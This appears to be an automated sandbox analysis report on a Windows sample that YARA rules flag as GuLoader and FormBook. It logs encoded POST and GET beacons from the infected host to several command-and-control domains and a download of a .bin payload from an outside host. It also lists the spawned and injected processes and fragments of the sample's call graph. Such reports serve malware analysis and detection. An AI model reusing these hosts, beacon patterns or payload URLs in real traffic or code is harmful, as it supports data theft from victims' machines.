                                                                                                                                                                              Data Ascii: iS=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafc1+Og8zNlCg+TpTDRNM1697rzDAUY7rXOUGJeSUKu6U080rBYkQvccld6sDFvn70KPdI7I8j891HLxUtfON63JgX6afDZIXivTujsPruf+x3xfYRZNAJHJkdOGNh2HVxW4iS0rkFACfvjJjgahmPPEG4auEroCy/5/3MjqaAKtSKc=
Jan 11, 2025 04:01:58.586853027 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:01:58 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
76 | 192.168.11.20 | 49850 | 101.35.209.183 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:02:01.125547886 CET | 2578 | OUT | POST /31pt/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              Origin: http://www.yc791022.asia
                                                                                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 04:02:01.125627041 CET | 5349 | OUT |
                                                                                                                                                                              Data Ascii: hx5ldvTjjc97jdrgqNi/1irUr6c2zAw58C7wJdcynk74u+kKH/iGJCik/SpVXqS1DJxg4bgbr89iZ9Xvc3q1SJo6MTvNgsk76IauEVFKvA3MJCwg6CIDrj28tbryfEVpZBgNR27NAm4msjX7t5C6yOJ2XTuCSmPMsSV8uVeiPplI2chkwBCgQNRv0TT6FU7YJz8JTQn2/yimQhfa01/uH5Ledl7PuQbyNNEPqXOiwqUykc432zD
Jan 11, 2025 04:02:01.447990894 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:02:01 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
77 | 192.168.11.20 | 49851 | 101.35.209.183 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:02:03.968141079 CET | 488 | OUT | GET /31pt/?iS=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.yc791022.asia
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 04:02:04.288980007 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:02:04 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
78 | 192.168.11.20 | 49852 | 154.23.178.231 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:02:09.600085020 CET | 746 | OUT | POST /p3j6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              Origin: http://www.43kdd.top
                                                                                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=DX5WBz7Pi8kdj22dTEbYIsZHnuykdKr4UlBaU9yLhTjq5cozq3vE/2VLSWeO3ON7b6zxIInuXxfA6eAX/mHIAWzARjO76t43uIYnCMRR6CPQ0knJrIGMqKaoZSc9byRWeqIq+jvWxNykggQndmxW82DISLY2t6TA7KqDDvJNW08B0jd8LOZm0kAzG8w7MOko1g==
Jan 11, 2025 04:02:09.905251980 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:02:09 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                              79 | 192.168.11.20 | 49853 | 154.23.178.231 | 80
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Jan 11, 2025 04:02:12.425354958 CET | 766 | OUT | POST /p3j6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              Origin: http://www.43kdd.top
                                                                                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4Klhh3q58YzlWvE62VLdGeL6uNKb6uOIL/uXxLA6fwX8VvLBGzeaDOlnd43uIYnCM066CXQ1QjJ55GPnqarQyc9MiRSeqJN+iyexOakgiIndTNVz2DKWLYpj4Wzj+aoVP9wYX4N4VQmW8tC33cBCMJTOMlzol6fN6Plu2SFII8uGVjo9Xc=
                                                                                                                                                                              Jan 11, 2025 04:02:12.730467081 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:02:12 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                              80 | 192.168.11.20 | 49854 | 154.23.178.231 | 80
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Jan 11, 2025 04:02:15.255738974 CET | 6445 | OUT | POST /p3j6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              Origin: http://www.43kdd.top
                                                                                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 04:02:15.255806923 CET | 1470 | OUT |
                                                                                                                                                                              Data Ascii: PdC/8RX3wvB7rI7vfGVLlxuPuJk1b3JG7jPd17K/NRzNetyi0UejGZMa/FgO8ZiO6RSd+HthboA2mgG3Oh/8oe+F6BojwvxDwqunJZi2KyBuskhhHQGNuLvqRmFgAp32awM4bkPllPMusD1Y3DpDPH2wuZAMnIqaYgTYj1JrBpGa2dnZGYV/3t9nIh/77MBPE3+cAUgErm3bBe6Lvdr/gk/iD4w8Uf4dGuH6r7zj4oa1HpVZtiS
                                                                                                                                                                              Jan 11, 2025 04:02:15.561505079 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:02:15 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                              81 | 192.168.11.20 | 49855 | 154.23.178.231 | 80
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Jan 11, 2025 04:02:18.075582981 CET | 484 | OUT | GET /p3j6/?iS=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 04:02:18.380424023 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:02:18 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                              82 | 192.168.11.20 | 49856 | 208.91.197.39 | 80
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Jan 11, 2025 04:02:23.536418915 CET | 746 | OUT | POST /hxi5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              Origin: http://www.jcsa.info
                                                                                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=yzleTXLhZhPoxtlxk40Rf+ckMwdivYa5jwUHpnsK3RSbr7dFttGi7ep6DXmk7LkZjn3LUpIXiRA8O3knN1eSBfxxk/4+OAduVmnYs3Rzezo3JgFa9WtujVMxmLVsc/YXDd/WUPADj2jGv0mr7Mo0BYXm+Tri+aJ6SF8jPM3M+T2YCIPFWG1IXKuRcoUmJWLjDA==


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                              83 | 192.168.11.20 | 49857 | 208.91.197.39 | 80
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Jan 11, 2025 04:02:26.203465939 CET | 766 | OUT | POST /hxi5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              Origin: http://www.jcsa.info
                                                                                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Ascii: iS=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0imbrZ1FssGiuep6L3numbkojmK2Up0XiRU8O1snMCKTBPxz/P48AgduVmnYs3FVe1A3JQVa7zRt/lMyybVsNvYTDd/wUMEtj0bGvxar19o1WIWtzzq+zZYpZxcWFPH26jiHDeCfL0BsUZyjYYtOLUK4eKdxUxMO8QH9yYtLfiOAcrI=


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                              84 | 192.168.11.20 | 49858 | 208.91.197.39 | 80
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Jan 11, 2025 04:02:28.875220060 CET | 1220 | OUT | POST /hxi5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              Origin: http://www.jcsa.info
                                                                                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port
85 | 192.168.11.20 | 49859 | 208.91.197.39 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:02:31.549511909 CET | 484 | OUT | GET /hxi5/?iS=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 04:02:32.209933996 CET | 988 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:02:31 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                              Set-Cookie: vsid=910vr4841101513817758; expires=Thu, 10-Jan-2030 03:02:31 GMT; Max-Age=157680000; path=/; domain=www.jcsa.info; HttpOnly
                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_mhIwJkcXmIQtUN9NoTveXz3nUP25ykJtJDMnBBHF8xuiJ6DUqC9fx3NJJ9WyGlEqrzQxfDR2GyaB7ULAoBNGVw==
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49757 | 122.201.127.17 | 443 | 312 | C:\Users\user\Desktop\02Eh1ah35H.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:54:04 UTC | 181 | OUT | GET /BJuAryIbeCLh111.bin HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                              Host: babalharra.com.au
                                                                                                                                                                              Cache-Control: no-cache
2025-01-11 02:54:04 UTC | 249 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:54:04 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Last-Modified: Wed, 04 Dec 2024 09:14:22 GMT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Length: 290368
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              Data Ascii: !#Gu>I]v*a?Ki"BF\.?|"t{'E7^V'ON@HH*4&H;^qh}^!yVi@L%PN+^bL(U=]R|r0Y\N('ddy(t*K_HYSe`yInm>!:j



                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:21:53:30
                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                              Path:C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\02Eh1ah35H.exe"
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              File size:441'369 bytes
                                                                                                                                                                              MD5 hash:8B28F25BAFE08A5B838EE152A75D14AE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.28256040548.0000000004AC5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:21:53:56
                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                              Path:C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\02Eh1ah35H.exe"
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              File size:441'369 bytes
                                                                                                                                                                              MD5 hash:8B28F25BAFE08A5B838EE152A75D14AE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.28555602772.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:21:54:18
                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                              Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:16'696'840 bytes
                                                                                                                                                                              MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:4
                                                                                                                                                                              Start time:21:54:19
                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                              Path:C:\Windows\SysWOW64\waitfor.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\waitfor.exe"
                                                                                                                                                                              Imagebase:0x10000
                                                                                                                                                                              File size:32'768 bytes
                                                                                                                                                                              MD5 hash:E58E152B44F20DD099C5105DE482DF24
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.33482246521.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.33482135316.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:21:54:50
                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                              Imagebase:0x7ff632280000
                                                                                                                                                                              File size:597'432 bytes
                                                                                                                                                                              MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true


                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:18.7%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:15.9%
                                                                                                                                                                                Total number of Nodes:1580
                                                                                                                                                                                Total number of Limit Nodes:32
4860 6fdf27a0 4856->4860 4857 6fdf284e 4859 6fdf2854 GlobalSize 4857->4859 4861 6fdf285e 4857->4861 4858 6fdf283b GlobalAlloc 4858->4861 4859->4861 4860->4857 4860->4858 4861->4789 4863 6fdf2d8e 4862->4863 4864 6fdf2dce GlobalFree 4863->4864 4919 6fdf121b GlobalAlloc 4865->4919 4867 6fdf266b lstrcpynW 4870 6fdf25bf 4867->4870 4868 6fdf265a StringFromGUID2 4868->4870 4869 6fdf2638 MultiByteToWideChar 4869->4870 4870->4867 4870->4868 4870->4869 4871 6fdf267e wsprintfW 4870->4871 4872 6fdf26a2 GlobalFree 4870->4872 4873 6fdf26d7 GlobalFree 4870->4873 4874 6fdf1272 2 API calls 4870->4874 4920 6fdf12e1 4870->4920 4871->4870 4872->4870 4873->4780 4874->4870 4924 6fdf121b GlobalAlloc 4876->4924 4878 6fdf15b9 4879 6fdf15c6 2 API calls 4878->4879 4880 6fdf15c3 4879->4880 4881 6fdf1272 4880->4881 4882 6fdf127b GlobalAlloc lstrcpynW 4881->4882 4883 6fdf12b5 GlobalFree 4881->4883 4882->4883 4883->4786 4885 6fdf15d2 wsprintfW 4884->4885 4888 6fdf15ff lstrcpyW 4884->4888 4889 6fdf1618 4885->4889 4888->4889 4889->4790 4891 6fdf2586 4890->4891 4893 6fdf1891 4890->4893 4892 6fdf25a2 GlobalFree 4891->4892 4891->4893 4892->4891 4893->4798 4893->4800 4895 6fdf1272 2 API calls 4894->4895 4896 6fdf155e 4895->4896 4896->4792 4897->4804 4898->4825 4900 6fdf15ad 4899->4900 4900->4831 4907 6fdf121b GlobalAlloc 4901->4907 4903 6fdf123b lstrcpynW 4903->4827 4904->4834 4905->4828 4906->4829 4907->4903 4909 6fdf12c1 4908->4909 4910 6fdf122c 2 API calls 4909->4910 4911 6fdf12df 4910->4911 4911->4844 4913 6fdf2768 4912->4913 4914 6fdf2712 VirtualAlloc 4912->4914 4913->4843 4914->4913 4916 6fdf2aad 4915->4916 4917 6fdf2abd 4916->4917 4918 6fdf2ab2 GetLastError 4916->4918 4917->4850 4918->4917 4919->4870 4921 6fdf130c 4920->4921 4922 6fdf12ea 4920->4922 4921->4870 4922->4921 4923 6fdf12f0 lstrcpyW 4922->4923 4923->4921 4924->4878 5212 4028d5 5213 4028dd 5212->5213 5214 4028e1 FindNextFileW 5213->5214 5215 4028f3 5213->5215 5214->5215 5216 40293a 5214->5216 5218 4063ee lstrcpynW 5216->5218 
